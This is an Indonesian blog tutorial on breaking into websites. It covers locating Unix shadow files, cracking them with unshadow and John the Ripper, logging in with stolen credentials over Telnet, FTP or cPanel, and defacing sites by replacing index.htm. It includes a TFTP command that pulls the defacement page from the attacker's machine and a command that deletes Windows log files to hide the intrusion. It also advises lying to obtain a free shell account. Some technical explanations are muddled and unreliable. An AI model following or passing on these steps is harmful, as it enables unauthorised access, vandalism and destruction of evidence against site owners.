Belajar Hacker A-Z Part 4 (PASSWORD)

 PENGGUNAAN FILE-FILE PASSWORD
Lanjutan dari Part 3
Sebelum memulai pembahasan bagian ini, sebaiknya –tapi nggak harus sih—Antum melihat kembali penjelasan tentang pengertian filepassword pada pembahasan awal, yang berisi tentang istilah-istilah dasar dan definisinya.
Jika file passwordterselubung (ter-shadow), apa yang harus kita lakukan? Sekarang nich –misalnya—semua file passwordter-shadow, tapi…ternyata ada cara untuk membongkarnya.
Jika ada file password yang tershadow, maka Antum harus mencari file yang namanya shadow.
Terus, di mana kita bisa menemukan letak file shadow di dalam sistem?
File shadow ini memang hanya terletak di direktori-direktori tertentu. Masing-masing sistem operasi punya tempat sendiri dalam meletakkan file ini. Nah, berikut ini tabelnya:
Untuk Linux: etc/shadow simbolnya adalah: *
Untuk SunOs: /etc/master Passwd atau /etc/shadow simbolnya adalah: *
Sistem SunOs punya banyak simbol password, tapi yang paling populer adalah: *
Untuk FreeBsd: /etc/master Passwd atau /etc/shadow simbolnya adalah: *
Untuk simbol versi yang baru bentuknya adalah: x
Untuk IRIX: /etc/shadow simbolnya adalah: x
Untuk AIX: /etc/security/passwd simbolnya adalah: !
Untuk ConvexOS: /etc/shadow atau etc/shadpw simbolnya adalah: *
ini sangat memudahkan pekerjaan kita. Karena, misalnya Antum menjumpaipassword dalam simbol !, berarti password itu tertulis di dalam /etc/security/passwd.
Selanjutnya, Antum silahkan memanfaatkan keterangan di atas.
Inilah contoh tentang file shadow. (file Shadow adalah file yang memuat kodepassword yang benar)
File shadow yang membahas tentang kode terselubung, langkah terakhirnya adalah menggabungkan file password dengan file shadow.
Saya sarankan, untuk menggabungkan file password dan file shadow, sebaiknyaAntum menuliskan command yang akan saya sebutkan nanti, di dalam program John the ripper. Berikut ini link untuk mendown load program John The Ripper: http://www.openwall.com/john
Saya kasih tahu dulu ya… bahwa program ini khusus untuk memecahkan kodepassword. Hanya saja, ada command khusus yang bisa difungsikan untuk menggabungkan file shadow dan file password, command ini dilakukan untuk menjamin tidak terjadinya error ketika menggabungkan keduanya. Command itu adalah: Unshadow passwd.txt shadow.txt
Kalau penggabungan dengan cara ini tidak berhasil, Antum bisa saja melakukannya dengan cara manual, dan itu mudah. Akan tetapi untuk menjamin tidak terjadinya kesalahan ketika menggabungkan dengan manual seperti ini, Antum ganti simbol x pada file password dengan “L” yang ada dalam file shadow. Selanjutnya, lakukan hal yang sama (mengganti setiap simbol x yang ada di file password)
Setelah dua file ini berhasil digabungkan, program John The Ripper sudah siap untuk dijalankan. Selanjutnya program ini akan menganalisa kode password (lalu mengeluarkan hasilnya) dengan sangat “cepat”. Tapi, Antum harus sabar ya…sebab analisa ini kadang bisa berjalan berhari-hari (lihat penjelasannya di akhir artikel ini).
Ok… sekarang taruhlah kita udah dapat kode password yang benar, lalu apa yang harus kita lakukan selanjutnya?
CARA MEMANFAATKAN PASSWORD
Antum bisa memanfaatkan passwords suatu situs dengan masuk ke Tel Net. Silahkan masuk ke Tel Net, dan Antum bisa berbuat sesuka Antum. Atau, bisa juga masuk ke program FTP, dan ini lebih mudah dan lebih populer.
Lalu, bagaimana masuk dengan program FTP? Antum bisa memakai salah satu dari sekian program FTP, di antaranya:
Ws_Ftp atau Build 10.4.1 atau CuteFTP 4.2.5
Kalau ini berhasil, sekarang –dengan pertolongan Alloh—kita bisa menyerang situs dan mengganti tampilan awalnya dengan –misalnya—“SITUS INI TELAH DIHACK”. Terus… gimana caranya?
Antum sudah bisa merubah tampilan awal situs ketika password dari situs itu berada di tangan Antum. Setelah Antum tahu passwordnya, silahkan masuk ke situs. Lalu, cari file index, silahkan Antum buka file ini dan delete saja, atau Antum ganti denganfile lain tapi namanya dibuat sama (index.htm), semua yang kita inginkan itu bisa kita jalankan melalui program Cute FTP atau WS_FTP PRO. Program ini mudah kok,insyâ Allôh…
Antum juga bisa mencoba masuk ke ruang pengaturan (control panel) sebuah situs.
Kebanyakan, ruang pengaturan situs dibuka dengan mengetikkan:
Ini kalau situs itu menggunakan program Cpanel, tapi program ini paling banyak digunakan oleh situs-situs.
Setelah ini, akan keluar jendela yang meminta Antum menuliskan username danpasswordnya, nah (karena Antum sudah punya) Antum bisa masuk, bi idznillâh…
Di sini akan kita jelaskan juga aksi yang sama dengan di atas, tapi menggunakan program TFTP. Bagaimana merubah tampilan awal situs dan mengupload filedengan menggunakan program TFTP?
Coba Antum bikin file berisi tampilan situs, jangan lupa menuliskan slogan yangAntum inginkan di dalamnya. Kalau sudah, save file tersebut dan beri nama: index.htm, letakkan di drive c:\
Kalau sudah, jalankan program TFTP nya, lalu masukkan command berikut ini:
c:\tftp.exe “-i” 1.1.1.1 GET index.htm dan C:\inetpub\wwwroot\index.htm
Rinciannya adalah berikut ini:
tftp adalah program yang harus ada untuk melakukan upload. Program ini harus aktif ketika command dijalankan.
“-i” maksudnya adalah parameter yang dipakai untuk membaca data dalam database.
1.1.1.1 adalah nomor IP Antum
GET adalah perintah untuk meminta file, mau dilepas atau didatangkan.
Index.htm adalah nama file di komputer Antum.
\inetpub\wwwroot\ adalah nama penunjuk di server.
Index.htm adalah nama file di server.
Sekarang, ada satu hal penting yang mesti dilakukan ketika Antum meng-hack suatu situs. Yaitu menyamarkan identitas setelah melakukan hack, supaya tidak dikenali oleh pemiliki situs, sehingga dia nanti akan menyakiti atau berbuat jahat kepada kita. Gimana caranya?
Kita tulis command berikut ini pada DOS: c:\ del c:/winnt/system32/logfiles/*.log
Atau, bisa juga kita masuk ke c: lalu ke windows, nah di sana ada file system32, setelah itu kita hapus dan delete semua file yang diakhiri dengan .log.
Sekarang, saatnya kita tambahkan satu point pembahasan penting, yang barangkali akan berguna bagi para ikhwan yang menggunakan sistem operasi Linux dan melakukan hacking. Point itu adalah, bagaimana cara mendapatkan program Shell Account secara gratis. Untuk mendapatkannya, berikut ini penjelasannya:
Sebelumnya, perlu diketahui bahwa Shell Account itu ada dua:
5) restricted 6) non-restricted
Apa bedanya? Kalo restricted harus bayar, tapi Antum bisa memasukkan commandberbentuk apa pun. Adapun non-restricted itu nggak bayar (alias gratisan); tapi yang jadi masalah, Antum tidak bisa memasukkan semua bentuk command di dalamnya.
Untuk memperoleh Shell Account gratisan, Antum bisa mengunjungi situs yang menyediakannya. Di antaranya adalah: http://www.cyberarmy.net
Atau, Antum bisa membuka help, dan mintalah Shell Account. Tentu dia akan bertanya, mengapa kamu menginginkan Shell Account? Jawab aja… saya mau memakainya untuk berlatih mengoperasikan Linux dan Unix, nanti.
Jawaban seperti ini sudah cukup, dia akan memberikan Shell Account kepadaAntum.
Command dalam Shell Account itu banyak sekali bentuknya, masing-masing punya keistimewaan, urutannya adalah berikut:
1. Telnet
2. Nslookup, ini akan memberi Antum data-data tentang nameservers.
3. ftp
4. finger
5. trace route
6. dig, command ini biasanya tidak bisa dipakai dalam Shell Account gratisan
7. netstat
8. gcc, ini adalah Compiler untuk bahasa program c
9. gzip, berfungsi untuk membuka file yang di compress
10. lynx, adalah penjelajah (explorer) pada situs internet

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s